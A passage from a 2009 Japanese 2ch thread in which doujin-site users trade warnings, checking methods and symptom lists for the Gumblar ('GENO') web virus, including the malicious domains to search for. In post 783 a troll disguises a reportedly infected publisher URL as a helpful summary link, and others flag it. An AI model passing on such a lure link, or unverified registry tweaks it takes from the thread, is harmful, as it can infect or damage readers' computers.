万が一の可能性も有るので、一度確認して欲しいとメールで教えるべきだろうか

2chは絶対やっていない人だし
他の閲覧者のためにも気づいたからには確認だけでもと教えるべきなんだろうけど
オフで毎回会うため、かかっていてもいなくても気まずくなりそうで尻込みしてしまう
712geno:2009/05/17(日) 20:29:56 ID:Lmy8/K2O0
故意にウイルス貼ってるのって通報出来るレベル?
713GENO:2009/05/17(日) 20:30:01 ID:6wI7BpUzO
>>702
やめろ
714geno:2009/05/17(日) 20:30:04 ID:VMJs7OWr0
>>705
なんという情弱・・・
しかもコピペしまくって自分の情弱っぷりを宣伝するとはw
715GENO:2009/05/17(日) 20:30:16 ID:7bIAj8MN0
>>712
逮捕レベル
716GENO:2009/05/17(日) 20:30:30 ID:nQ7xGg9OO
>>702
味しめちゃったか?
ひっかかるアホがいるからこうやってつけあがるんだよ。

URLはよく確認してから飛んで
717GENO:2009/05/17(日) 20:30:51 ID:94GIamPZ0
※今来た人へ

>>702に書いてあるアドレスの二つ目は絶対に踏まないこと。
ウィルスに感染する危険性大です
718GENO:2009/05/17(日) 20:30:58 ID:mLHd5kVY0
ID:eGBOhN1B0
NG推奨
719GENO:2009/05/17(日) 20:31:14 ID:Mv+Un+zhO
>>682
GENOチェッカの結果からメール連絡出来るようになってたから、
差し支えなければ中の人に報告しといた方がいいかも
720geno ◆XksB4AwhxU :2009/05/17(日) 20:31:31 ID:kHrEHGt60
>>706どういうサイト?
721GENO:2009/05/17(日) 20:31:38 ID:dB3YX/lPO
悪意を持ってやってるのは明らかなんだから
さっさと通報すればいいんだよ
722名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 20:32:01 ID:MmWu1w5h0
>>711
はやくメールするんだ!
723GENO:2009/05/17(日) 20:32:02 ID:94GIamPZ0
>>720
ウィルスに感染してる出版社のサイト
踏んだらアウト
724GENO:2009/05/17(日) 20:32:09 ID:Mk4tVeWS0
>>720
成美堂出版(ウイルス感染中)
725名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 20:32:09 ID:xxtfVAGT0
>>606と702の二件目リンクは
感染サイトだから絶対踏むなよ!!
初心者釣って楽しいか?こういう時の愉快犯は最悪だ

726GENO:2009/05/17(日) 20:32:19 ID:FFClEI90O
通報!

VistaとMACは今のところ大丈夫?
727geno ◆XksB4AwhxU :2009/05/17(日) 20:32:43 ID:kHrEHGt60
>>723
  わかりました
728名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 20:32:47 ID:VMJs7OWr0
>>711
「なんかavast!が反応するんですけどー」ってメールしとけ。
そんで管理人が「何ともないよ」て返信してきたら、
「こっちでも気になって調べてみたらこんなんありましたー」
って、まとめサイトのURLを送れば宣し。

つうか「絶対に2chやってない人」なんて存在しない。
729geno:2009/05/17(日) 20:33:33 ID:VjBXZ8u8O
sqlsodbc.chmが全く見つからないんですけど、
存在しないなんてことはまず無いですよね?
730GENO:2009/05/17(日) 20:34:21 ID:94GIamPZ0
>>729
使ってるOS(XPとかVistaとかMACとかにもよる)
731geno ◆XksB4AwhxU :2009/05/17(日) 20:34:32 ID:kHrEHGt60
>>729
osは?
732GENO:2009/05/17(日) 20:34:39 ID:nJMjzqbv0
seibidoshuppanはもうNGワードにぶち込んだほうがいいな
733GENO:2009/05/17(日) 20:34:52 ID:LCGyHUY90
たびたび張られるようだしURLをNGにぶっこんどけ
734GENO1:2009/05/17(日) 20:34:56 ID:T3udBbN00
>>テンプレ作成者
専ブラ使用者に以下のURLをNGワードに加えるってことを記載してほしい
seibidoshuppan.co.jp/
735GENO:2009/05/17(日) 20:35:02 ID:wwhnPsIdO
>>729
OSによる
736GENO:2009/05/17(日) 20:35:02 ID:aTSY2Ugx0
>>728
2chってだけで嫌悪する人も多いからね
とりあえず反応しましたってメールして、
まとめサイト送るのが憚られるならニュースサイトのアドレスでも貼ったらどうだろう

>>729
>>9
737GENO:2009/05/17(日) 20:35:06 ID:93ON2mRO0
>>728
まあ非ヲタなら「絶対やってない」はありえるけどな…
ヲタなら見てない人の方が少ないわな
738GENO:2009/05/17(日) 20:35:11 ID:LVavXGx10
>>694
前にGENOウィルスらしきものにひっかかったサイトさんが、
サイトのソースの改ざんには結構タイムラグがあるって
書いてあったので、すぐとは限らない気がする
警戒は怠らないほうがいいかも
739名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 20:35:33 ID:9eiBh3qY0
>>729
XP?
740GENO:2009/05/17(日) 20:35:51 ID:tWecBrH+0
>>711
できれば自分でソース自体を読むべき(>>688 )
でもやりかたわかんなかったらもうメールしていい
741GENO:2009/05/17(日) 20:36:19 ID:m8MDxN0TO
アバスト入れてからアプリケーションエラーが出る
再起動したり強制終了しても変わらず
同じ症状出てる人いる?
742geno:2009/05/17(日) 20:36:30 ID:eFvuP/5h0
せいびどう踏んだ…おわた
50kbで数値はおかしくないしレジストリエディタとかもちゃんと出るんだけど
これはアウト?っていうか踏んだら絶対感染ってわけじゃないんだよな?
743GENO:2009/05/17(日) 20:36:32 ID:bY7I82yN0
どうしようかうろうろしてたんで、即レスマジでありがとう
うろたえてたが目が覚めた

世話になっている方なので迷っていたけど
万が一のチェックと言うことを前面に出してとりあえず報告だけは出してくる
嫌われたら、そのときゃしょうがないか
なんとか上手く伝わる文章仕立てて早急に送信してきます
744GENO:2009/05/17(日) 20:36:46 ID:l5MsZZlCO
>>704
レジストリエディタはどれですか?
745GENO1:2009/05/17(日) 20:36:56 ID:T3udBbN00
>>704
それは、XP、2k、Vistaの全ての対応?
746GE:2009/05/17(日) 20:37:07 ID:gL3wqKiX0
ウィルス張る奴は通報でいいだろう。
747GENO:2009/05/17(日) 20:37:20 ID:yenDHFuc0
>>742
ウィルスチェックした?
748GENO:2009/05/17(日) 20:37:30 ID:7pbiQCXC0
>>729
自分はXPだけど>>532で地道に見つけた
もっと簡単なやり方はこれまでに出てるはず
749729:2009/05/17(日) 20:37:38 ID:VjBXZ8u8O
すみません。OSはvistaです。
750GENO:2009/05/17(日) 20:37:55 ID:b4151Qdd0
>662
かわいそうもなにも、対策しない小林君が悪いよ…成美堂も名前出してほしいぐらいだ
751GENO:2009/05/17(日) 20:38:04 ID:H2FcPRpe0
>>742
絶対感染とは限らないけど警戒はしといたほうがいいよね
752GENO1:2009/05/17(日) 20:38:08 ID:T3udBbN00
>>743
予防も兼ねて連絡だけはするべきだろう
753geno:2009/05/17(日) 20:38:32 ID:U/BebqKb0
>>742
ウイルスチェックしろ
どっちにしろクリーンインストールした方が良い
754GENO:2009/05/17(日) 20:38:36 ID:GEQ8HxWY0
>>729
Vistaにはないって既出
いいかげんまとめ読んでからこい
755名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 20:39:19 ID:xxtfVAGT0
感染していないうちに、FTPツールから、
パスとか抜いてまっ白にしておくというのは
感染拡大を防ぐ意味でアリかな。
自分はやったけど。
あとフラッシュはともかく、PDFはそんなに見ないので
アンインスコしたよ。
使わないものは極力抜いておくのが一番安全かなと思った。
756geno:2009/05/17(日) 20:40:00 ID:VMJs7OWr0
>>741
1.他のセキュリティソフトを入れてるなら、それと競合している
2.既にGENOウィルスに感染していて、avast!を妨害されている
757GENO:2009/05/17(日) 20:40:03 ID:EyL04HalO
感染サイトを見ても確実に感染するとは限らない

しかしサイトの改ざんなど、すぐに影響が出るとは限らないので警戒を怠らぬように

ってアナウンスもいるかな
758GENO:2009/05/17(日) 20:40:29 ID:3tJHxGg40
>>754
Vistaは違うフォルダにあるんであって、存在はしてる
759GENO:2009/05/17(日) 20:40:35 ID:TaIIF7Gd0
>>753
どっちにしろ
は言い過ぎ。
760応急処置:2009/05/17(日) 20:40:45 ID:qOvxNlFx0
>>744
携帯電話にはそもそも無い機能なのでスルー

>>745
全部対応しています

>>742は一度>>704をやってみるべき
761GENO:2009/05/17(日) 20:40:54 ID:c/jP7xJJO
>>754
自分vistaだけど普通にあったぞ
762GENO:2009/05/17(日) 20:41:12 ID:jh6k4nixO
バスターのセキュリティレポートのフィッシング詐欺対策の詳細ログにgumblar.cnってやつがあるんだけどブロックされてるのかな?
何度もウイルスチェックしても異常無し
コマンドもレジストリも立ち上がるしバイト数も異常無し
ただCドライブの使用領域とても食ってる気がする…
これは大丈夫なのかな
763754:2009/05/17(日) 20:42:01 ID:GEQ8HxWY0
すまんミスった
764GENO:2009/05/17(日) 20:42:02 ID:gD3Q2p120
GENOウイルス何をしたんや〜!




パンデミック!
765名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 20:42:04 ID:NV1jV/fZP
>>744
釣りだから相手にすんな
つか、コピペ真に受けてレジストリなんかいじってたらウィルス感染するより悲惨だぞ。
レジストリは自他共に上級者な人間だけが自己責任でいじるもの。
766名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 20:42:07 ID:L102Hcqz0
>>754vistaにあるよ。

ローカルディスク

windows

Help

mui

(0411)とか他の4桁の数字のフォルダの中にあります。
767GENO:2009/05/17(日) 20:42:28 ID:YTyiaKe60
441 名前: ムラサキサギゴケ(catv?)[sage] 投稿日:2009/05/16(土) 23:32:08.96 ID:K/FFIX2k
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ビコン」公式サイト【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
768ゲノ:2009/05/17(日) 20:42:30 ID:en3OEJg6O
602に安価つけてる奴、
安価ついてると削除依頼通らないの分かってやってんの?
あとレス番真っ赤になって目立って、余計皆が踏みやすくなるの分かってやってんの?
769GENO:2009/05/17(日) 20:42:43 ID:TaIIF7Gd0
>>760
まだ感染してるかどうかもわからんのに
>>704を勧めるってことは、>>704はやばいんですね、わかります
770GENO:2009/05/17(日) 20:43:10 ID:m8MDxN0TO
>>756
2が正解っぽい
操作出来なくなったし初期化も難しい
771GENO:2009/05/17(日) 20:44:09 ID:j45tczkC0
>>729
vistaには、Cドライブ→windows→Help→mui→0409か0411にある。
自分は、ファイル名で検索してもでてこなかったから↑の順でフォルダ見て探した。
772geno:2009/05/17(日) 20:44:37 ID:ugI/Fqnf0
>>729
Vistaは、マイコン→C:→Windows→Help→mui→0411(か、0409)で見つかるはず
773geno:2009/05/17(日) 20:45:32 ID:NV1jV/fZP
>>768
どうでも良いが落ち着けよチキン携帯厨
774ゲノ:2009/05/17(日) 20:45:48 ID:+xkR7190O
次スレの>>1

【注意】
愉快犯などにより、感染サイトのURL張り付けなどが行われています。
下記のまとめサイト以外のURLは不用意に踏まないでください。
(まとめURL)

みたいなの書いたほうがいいのかな。
775geno:2009/05/17(日) 20:45:55 ID:ugI/Fqnf0
ごめん、リロすりゃよかったな
776げの:2009/05/17(日) 20:46:04 ID:CqbD49hO0
>>768
602は違うだろ
777名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 20:46:44 ID:NV1jV/fZP
>>770
ご愁傷さまです。
OS再インスコ頑張ってください。
778リカバリ中:2009/05/17(日) 20:46:47 ID:GsjczrDRO
感染して腹たったからカタログ頼りにサイト巡りしてきた
779GENO:2009/05/17(日) 20:46:54 ID:vwoCpmrZ0
XPでIEだけど最新にすれば大丈夫?
他のブラウザカスタマイズが難しいので出来ればIEのままがいいんだけど…
780GENO:2009/05/17(日) 20:47:04 ID:nu8RG1Sa0
成美堂なんて今日の深夜から 騒ぎになってるだろ
踏むな踏むなといちいちうるせえよ
781GENO:2009/05/17(日) 20:47:57 ID:TaIIF7Gd0
>>770
それ以前に、ウイルスに感染しているかどうかのチェックはしたのか?
782geno:2009/05/17(日) 20:48:00 ID:2DBq/lRNO
初心者は大人しく安全確認出来たら
俺みたくPC切ってしばらく携帯でネットしようぜ
783GEnO:2009/05/17(日) 20:48:44 ID:eGBOhN1B0
同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/

■何をしたらいいか分からない人はまずここを見る。
http://www.seibidoshuppan.co.jp/
何をすれば良いか良く分からない人用のまとめ

■よくある質問>>1
■主な症状 >>5
■自ジャンルで発見した場合
→まとめページを見て、重複がない場合は>>4

※まとめサイトの方が拾いやすいように、
まとめサイトへの報告他は、必ず>>1
アンカーを入れて報告してください。

GENOウィルスことGumblarの報告してくれてるブログ
ttp://www3.atword.jp/gnome/tag/zlkon/
あと非同人向けまとめサイト
ttp://www.seibidoshuppan.co.jp/
784GENO:2009/05/17(日) 20:48:58 ID:MYTBJqff0
>>778

何の意味が?
785GENO:2009/05/17(日) 20:48:59 ID:9MpnOPGl0
>779
その程度がめんどうなら
そのままサイト回って感染すればいいよ
786ジーノ:2009/05/17(日) 20:49:12 ID:en3OEJg6O
サーセン702だった

携帯なのは許せ、今出先でPCが無い
787 ◆NAO/2MXDEk :2009/05/17(日) 20:49:50 ID:x4bezYAc0
多分、席を外したら次スレいくような気がするので、
もし良かったら >>680,690,701 を担当の人に見せて貰えるとありがたいです。
そいでは。
788GENO:2009/05/17(日) 20:49:55 ID:+ZOEolYh0
クリンインスコオワタ
789GENO:2009/05/17(日) 20:50:01 ID:H/MvH62k0
>>779どうして>1が読めないの?
790GENO:2009/05/17(日) 20:50:09 ID:FFClEI90O
783は明日脂肪!
791GENO:2009/05/17(日) 20:50:19 ID:pnqeRJ0P0
>>767のコピペまじで?
国の管轄サイトまで感染してんの?
792geno:2009/05/17(日) 20:51:26 ID:T5sfXoTL0
あの、同人サイト向け・通称「GENOウイルス」対策まとめ 、だいじょぶ?
へんなとこいかへん?
793GENO:2009/05/17(日) 20:52:13 ID:FOI08nCn0
>>791
真偽は知らんが、
もし担当者が感染したパソコンで更新したら当然サイトはやられる
794GENO テンプレ:2009/05/17(日) 20:52:20 ID:z0Wd4A3c0
ちょっと用事しているので、次スレの時に、立ち会えそうにないので、
現時点の次スレテンプレ再度貼ります。

必要時修正訂正し、ご利用ください。
795GENO:2009/05/17(日) 20:52:25 ID:nQ7xGg9OO
>>780
その騒ぎを知らんやつがいるから踏むやつも出てくんだろ。
そいつらがうかつに踏んで愉快犯喜ばせるんだったら
踏むな踏むないうっての。
796729:2009/05/17(日) 20:52:26 ID:VjBXZ8u8O
729です。皆さん親切に教えて下さってありがとうございました。
無事に見つかりました。本当にありがとうございました。
797GENO:2009/05/17(日) 20:53:39 ID:iVD93bW1O
>>792
心配なら踏むな
798GENO:2009/05/17(日) 20:54:17 ID:5wGg6e3v0
>>779
ウイルスバスター入っているならIE8にはするなよー
IE8に対応してないから〜

トレンドマイクロ製品における Microsoft Internet Explorer 8 の対応について
ttp://esupport.trendmicro.co.jp/Pages/JP-2064814.aspx


>>792
何が大丈夫?
日本語おかしいよー
799GENO:2009/05/17(日) 20:54:19 ID:+sIlCkiL0
釣って感染させて得するのはウイルス創った馬鹿だけなのになあ
800GENO:2009/05/17(日) 20:54:19 ID:nu8RG1Sa0
>>795
踏むな踏むなと騒いでる時点で愉快犯の思う壺だろ
何言ってるんだ
801GENO テンプレ1:2009/05/17(日) 20:54:20 ID:zdSsda7G0
1----------------------------------
新種のコンピュータウィルスが流行っています。
感染サイトを見ただけで感染・発症する危険があり、大半のアンチウィルスソフトで検知されません。
変化が早く、一部の検知可能なソフトも最新型には対応できていない状況です。
全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。
特にサイト管理人は二次被害を起こしてしまいますので、早急な確認が望ましいと思われます。

感染サイトを見ても確実に感染するとは限りません。
しかしサイトの改ざんなど、すぐに影響が出るとは限らないので警戒を怠らぬようにお願いします。

※スレ内には、悪意あるソースコードや、誤認情報を貼る人もいますので、ご注意ください。
※感染サイトURLが貼られるケースもあります。むやみにリンクを踏まないようにご注意ください。

■同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/

■何をしたらいいか分からない人はまずここを見る。
http://www40.atwiki.jp/gegegeno/
何をすれば良いか良く分からない人用のまとめ

【注意!!】まとめサイトへの報告は、まとめサイトの人が分かりやすいように、>>1へアンカーをつけてください。

前スレ
【管理も】同人サイト・GENOウィルス注意5【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242540064/

・まずは、何をしたらいいの? >>2
・主な症状>>3
・自ジャンルで感染を見つけてしまった >>4
・よくある質問 >>5
・ソースチェックはどうやって? >>6
802GENO:2009/05/17(日) 20:54:20 ID:l5MsZZlCO
>>792
>>1のリンクは信頼できます。
803GENO:2009/05/17(日) 20:54:26 ID:wCpVuXWi0
>>783
 そんなに逮捕されたいのか?
804GENO テンプレ2:2009/05/17(日) 20:55:08 ID:zdSsda7G0
2----------------------------------------

■絵で見て分かる簡単な画像
ttp://ranobe.com/up/src/up360283.jpg

■絵で見て分かる 更に画像
ttp://ranobe.com/up/src/up360236.gif

※まずしないといけない事※

自分が感染していないかをチェックと
自分のサイトが感染していないかチェックをしましょう

1、自分が感染していないかチェック
ttp://www31.atwiki.jp/doujin_vinfo/pages/12.html

2、サイト管理人は、自サイトが感染していないかチェック
ttp://www31.atwiki.jp/doujin_vinfo/pages/16.html
805GENO:2009/05/17(日) 20:55:20 ID:m8MDxN0TO
>>770です

レジストリ開かず
@ニフのウイルススキャンはセーフ

とりあえず感染の可能性有りな人達は
アバスト入れない方が良い
806GENO:2009/05/17(日) 20:55:44 ID:WZQN5UgD0
>>800
10個上のレスも読んでない人がごろごろ来てるから
わかりやすくしとくに越したことはないと思う
807GENO テンプレ3:2009/05/17(日) 20:55:49 ID:zdSsda7G0
3------------------------------------
主な症状

※全く同じ動作になるとは限りません

・感染後にFTPに接続するとログイン情報が送信され勝手にFTP上のファイルを改竄される
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集している恐れ
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時に正常に起動できず、画面が真っ青になって警告が表示される(BSOD)
808geno:2009/05/17(日) 20:56:14 ID:quuri9v60
テンプレの3、初心者向けにしてみた。余計だったかな。意見下さい。

3------------------------------------
主な症状

◆感染後にFTPに接続するとログイン情報が盗まれ、FTP上のファイルに閲覧者を感染させるスクリプトを勝手に書き加えられる
◇web上でのやりとりを監視、ユーザー名やパスワード等の情報を収集している恐れあり
◇一部のアンチウイルスソフトが更新不能
◇Windows Update、アンチウイルスソフト関連サイトなどにアクセス不能
◇Googleの検索結果を改竄(リンクを弄る)
◇explorer.exeや一部のブラウザが異常終了
◇Acrobatが勝手に起動
◇PDFファイルやシステムファイルが増殖
◇CPU、メモリ使用率がUP(パソコンが重くなる)
◇再起動時に正常に起動できず、画面が真っ青になって警告が表示される
◆sqlsodbc.chmを改変
◆cmd.exe、regedit.exeが起動不能

これらの症状が全て出るとは限りませんが、
◆の症状があったら感染濃厚です。
809GENO:2009/05/17(日) 20:56:21 ID:QLzzfnQk0
>>704はPCの管理者権限をなくしてしまう設定に見えるんだが気のせいか
810GENO:2009/05/17(日) 20:56:36 ID:44Ro6FrG0
>>803
だから安価つけるなっちゅうに
IDとアドレスNG登録しとけ
811GENO:2009/05/17(日) 20:56:57 ID:aTSY2Ugx0
改変してるレスにアンカつけてる人は
削除申請通りにくくなるっていうログすら読めないの?
余計調子乗るし放置が一番
812GENO:2009/05/17(日) 20:57:28 ID:bb/rSAt40
明らかに愉快犯が紛れ込んでいるな…
813GEnO:2009/05/17(日) 20:57:40 ID:eGBOhN1B0
>>803
><
814GENO:2009/05/17(日) 20:57:47 ID:yKmrVTN+0
とりあえず今はネトサ控えてURLも安易に踏まないようにしろ
815GENO:2009/05/17(日) 20:57:54 ID:1xXjSd4OO
テンプレ針中失礼

783の二番目と最後のURLは踏まないで!
(安価つけると削除対象から外れるのでつけていません)
816GENO:2009/05/17(日) 20:57:59 ID:k5Es+N2e0
通報
817GENO:2009/05/17(日) 20:58:04 ID:nQ7xGg9OO
>>800
たしかにあんま大人数で構わないで1人が注意すりゃいい話だな。
自分みたいにリロしないで踏むなって書く人が多いから騒がしくなるんだろう。
818GENO:2009/05/17(日) 20:59:00 ID:KcilJVxd0
>>798
マジか!
バスター使えねえな…
819GENO テンプレ4:2009/05/17(日) 20:59:33 ID:5okXfK6E0
【よくある質問】

Q:感染するとどうなるの?
A:あなたのパソコンに侵入したウイルスは、
 FTPによる通信を行った時点でFTPのIDとパスワードを盗みます。
 そうなるとFTPでアップロードしたサイトのファイルに悪意を持ったコードが勝手に挿入され、
 そのサイトを見た人を感染させます。
 その他の個人情報が盗まれるのかどうかはまだわかっていません。

Q:ウィルスソフトが反応していないから大丈夫だよね?
A:マルウェアは対策が遅れる事があり、セキュリティソフトも対策が間に合っていない場合があります。
 又、対策したと思われても、亜流が常に出てくる可能性もあります。

Q:VistaとMacは感染しないの?
A:某企業サイトでの発見直後はVista、Macには感染しないと言われています。
 (新種も現れており、100%安心できる状況とは断言出来ません)

Q:〜〜が感染しているって本当??
A:誤報が先走り、実際の感染確認が出ていないケースがたびたびあります。
 例)ニフティ(ポータルサイトやスキャンページを見ても問題ないので落ち着いて)

Q:チェッカーの数値が高くてもただのJavascriptに反応している場合が有ります
 一旦安全な手段でソースを確認しましょう

Q:閲覧先のサイトに変なコードがあるんだけど!
A:元々記載されている、スクリプトの可能性も高いです。まずは落ち着いて。

Q:とにかく何をしたらいいの?
A:>>2

Q:素人なので、とにかく何もかもが分からない。
A:http://www40.atwiki.jp/gegegeno/
820GEnO:2009/05/17(日) 20:59:44 ID:eGBOhN1B0
ここvip以下だな
821GENO:2009/05/17(日) 21:00:06 ID:H2FcPRpe0
成美堂貼ってるやつのさーNGワードにして放置って専ブラの人はいいんだけど
突っ込みいれないでおいたら紛れこんじゃった初心者たんが踏んじゃわない?
突っ込んでも踏むは踏むのか。
822GENO テンプレ5:2009/05/17(日) 21:00:19 ID:5okXfK6E0
5----------------------------------
当スレでは感染報告については、注意喚起の観点から

・感染が認められたジャンル名

のみ報告OKです。
感染報告をする際は、ジャンル名・ジャンル内シリーズ名など
伏字・略称にせず、わかりやすく書いてくだささい。

晒しやウォチ、風評被害を防ぐため、個人サイトを特定できる形で話題に出すのはNGです。
また、アドレス晒しは、踏むとマジで危ないので絶対厳禁。

※ 対策済みの所も注意喚起の意味で、ジャンル名記載が残されています。
※ 報告は、まとめサイトの人が分かりやすいように、>>1へアンカーをつけてください。
823GENO テンプレ6:2009/05/17(日) 21:01:00 ID:5okXfK6E0
6------------------------------------

サイトが感染しているかどうかは、ソースをチェックする事で分かります。
ソースのチェック方法は、ご自身の自己判断でお願いします。

以下に紹介するチェックは、大まかな危険を知るためのものです。
特有のコードがあるかどうかのチェックに使いますので、
この結果を見て=即感染と誤認しないようにお願いします。

※アクセスが集中すると、サーバーが重たくなる可能性があります。

●GENOウィルスチェッカー
 http://geno.2ch.tc/

http://wepawet.cs.ucsb.edu/ ソースチェック
 ここで「URL」と書かれている右のフォームに感染が疑われるURLを入力。
 「Resource type」のチェックボックスは「JavaScript/PDF」にチェックを入れ、
 「Submit for analysis」をクリック。
 すると解析結果が出るので、Ctrl+Fをタイプしてページ内を「gumblar.cn」「martuz.cn」で検索。

●ソースチェッカーオンライン(http://so.7walker.net/guide.php )
 右側に表示されるソースを見て、Wikiの「サイト管理人向け」に
 あるようなおかしなコードの有無を調べる。
 ※ソース以外の情報(左下の「安全度」等)は一切無視する。

●手動
 調べたいリンク先を右クリックなどから保存する。
 保存されたHTMLファイルを右クリックなどから
 メモ帳などのテキストエディタで開き、Wikiの「サイト管理人向け」に
 あるようなおかしなコードの有無を調べる。
824GENO:2009/05/17(日) 21:01:11 ID:yenDHFuc0
>>821
初心者を免罪符にする奴はレスを全く読まないからな。
825名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 21:01:20 ID:qAPJLyc90
正直釣られて感染サイト踏む人は2ちゃんしないほうがいいと思うし
いずれはどっかで感染するようなうかつ者だと思うけどね
貼る方が悪いのはもちろんだけど
826GENO:2009/05/17(日) 21:01:53 ID:ad5ecr7W0
おまいら、
レスを読むときは普段の2倍の時間をかけてゆっくり読み、3回読み返せ。
URLもしかり。踏むまえに一度アドレスを見ろ。
書き込む前に1回深呼吸。脊髄反射/感情的なレスだと感じたら、もう書くな。(大抵ほかの奴が同じこと書き込んでる。たとえ注意喚起でも)
827GENO:2009/05/17(日) 21:02:38 ID:44Ro6FrG0
>>821
テンプレに「テンプレ以外のまとめWiki誘導URLは踏むな」と書いておけばおk
それで踏んじゃうようならテンプレも読まない人の自業自得じゃないの?
828報告:2009/05/17(日) 21:03:46 ID:4AGy2oB30
既に名前出てるジャンルだけど

ヘタリアのキャラサーチで感染確認ありとジャンルスレに投下ありました
人気キャラだから念のため
829ジーノ:2009/05/17(日) 21:05:19 ID:en3OEJg6O
残念ながらこの板に限っては、感染URL踏んで自業自得じゃすまない

何故ならそういうバカに限ってサイト管理人で自分のサイトゾンビにするから

二次感染広がるぞ
830geno:2009/05/17(日) 21:05:35 ID:T5sfXoTL0
792です。昼間、踏んで、今、踏んで、ちょっとびっくりしただけ。
信頼できるなら、いいです。
802ありがとうございます。
831GENO:2009/05/17(日) 21:05:52 ID:gD3Q2p120
>>825
同意!
83250:2009/05/17(日) 21:06:07 ID:nbm7ZJwf0
次スレのテンプレですが、よければ全部貼り終えたら>>1にアンカください
まとめWikiの↓のページにまとめて掲載しておきますので、
http://www31.atwiki.jp/doujin_vinfo/pages/27.html
スレ立ての際に活用していただければ。

※このページはまとめWikiのメニューからはリンク貼りません
(2ちゃん臭をなるべく前面に出さないため)

今後テンプレ修正する際も>1アンカしてくれれば随時修正します

>>828追加してきます
833GENO:2009/05/17(日) 21:06:25 ID:Qe9puDQk0
AdobeReaderの最新版をダウンロードしたんだけど
セットアップ時に「ファイルを削除しています」だとかそんなんが出てきた。
びびってキャンセル押したが勝手にセットアップは進み完了してしまった。
慌てていろんなファイルの確認とかしたけど特に異変は無いし、最新版にも無事更新されている。
これって別に普通だよね?
偽サイトとかあるから不安なんだが…
834GENO:2009/05/17(日) 21:06:45 ID:oUobyklU0
テンプレにウイルスバスターとIE8のことも書いといた方がいいんじゃないかな
WindowsupdateするともれなくIE8になるし
835GENO:2009/05/17(日) 21:06:52 ID:MtHQx4iT0
>>ID:eGBOhN1B0
ごめん、通報しちゃった。てへっ
836GENO:2009/05/17(日) 21:07:10 ID:6wI7BpUzO
>>827
それがいいと思う
違う形でアドレスつけてくる場合もあるだろうし
テンプレ以外は踏まないのが一番
837GENO:2009/05/17(日) 21:07:25 ID:sdsXSD5p0
>>833
古いバージョンが削除されるだけだから問題ない
838GE:2009/05/17(日) 21:07:40 ID:gL3wqKiX0
>>835

俺も通報しちゃった。
839GENO:2009/05/17(日) 21:07:56 ID:44Ro6FrG0
>>833
旧バージョンを消しているだけなので問題なし
というかそういう表示が出てたと思うんだが
840geno:2009/05/17(日) 21:08:18 ID:D2qUpqPu0
>>798
インスコしてバスター入れてIEも最新にした自分オワタ
841GENO:2009/05/17(日) 21:09:46 ID:4OQGllW+0
>>1
テンプレじゃなくwikiのことだが
成美堂出版が感染中なのも書いておいたほうがいい。
同人サイトじゃないからリストにいれないのかもしれないけど
ここへ来ずに外部からまとめwikiだけ見に行く人もいるので。


ところで上のほうにあった角川書店がチェッカーで1000%ってのはなんだったの?
もし本当なら今治っていても踏んだ人がいるんじゃないかね
842GENO:2009/05/17(日) 21:09:46 ID:34DP5Nxe0
>>833
それは普通
「ファイルを削除しています」は古いAdobeReaderのファイルを削除しただけ
ちなみに自分もさっき最新版インスコ中に途中でやめようとしたけど
勝手に最後までインスコされた
でも特に問題なし
843GENO:2009/05/17(日) 21:09:47 ID:aTSY2Ugx0
>>1
>>798の追加お願いできますか?
844geno:2009/05/17(日) 21:09:47 ID:aRPChaoi0
◆XcxlmnqGqUさんへ 運営の人からの伝言

680 ◆NAO/2MXDEk sage2009/05/17(日) 20:13:02 ID:x2Ev6fa50
こんばんは。ウイルスチェッカーが何たらって話で来ました。

http://qb5.2ch.net/test/read.cgi/operate/1241361889/176-180

で、誰かkwsk話をばしてくれませんか。

690 ◆NAO/2MXDEk sage2009/05/17(日) 20:18:06 ID:x2Ev6fa50
>>683
geno.2ch.tc の転送量がキツいから、「鯖貸してちょ」って話だと思ったんすけど、違ったんすかね。

701 ◆NAO/2MXDEk sage2009/05/17(日) 20:25:54 ID:x2Ev6fa50
なるほど
んじゃ、◆XcxlmnqGqUさん、取り敢えず以下のスレに来るか、この板のこの系統のスレで反応を下さい。

>以下のスレ
幸せサーバープロジェクト 「アイデア・技術のある人募集中」★3
http://qb5.2ch.net/test/read.cgi/operate/1241361889/

後、メールアドレスを一本用意しといてもらえると幸いです。

787 ◆NAO/2MXDEk sage2009/05/17(日) 20:49:50 ID:x4bezYAc0
多分、席を外したら次スレいくような気がするので、もし良かったら >>680,690,701 を担当の人に見せて貰えるとありがたいです。
そいでは。
845GENO:2009/05/17(日) 21:10:03 ID:nQ7xGg9OO
>>834
> WindowsupdateするともれなくIE8になるし

UPDATEしたら、IE8のインスコにすすみますか?って出て、
やだったからキャンセルしたんだよね。バージョン情報見てもIE7のままだし、
UPDATEしてもキャンセル押せばいいんじゃないのか?
それともだめ?
846geno:2009/05/17(日) 21:10:27 ID:rPGIPHzV0
自分もIE8にしてもた…!これってヤバいの?
847GENO テンプレ6:2009/05/17(日) 21:10:34 ID:HrVZV0z10
テンプレ(仮)です。次スレ立てる方は、たたき台に使ってください。

1 >>801
2 >>804
3 >>808 に修正
4 >>819
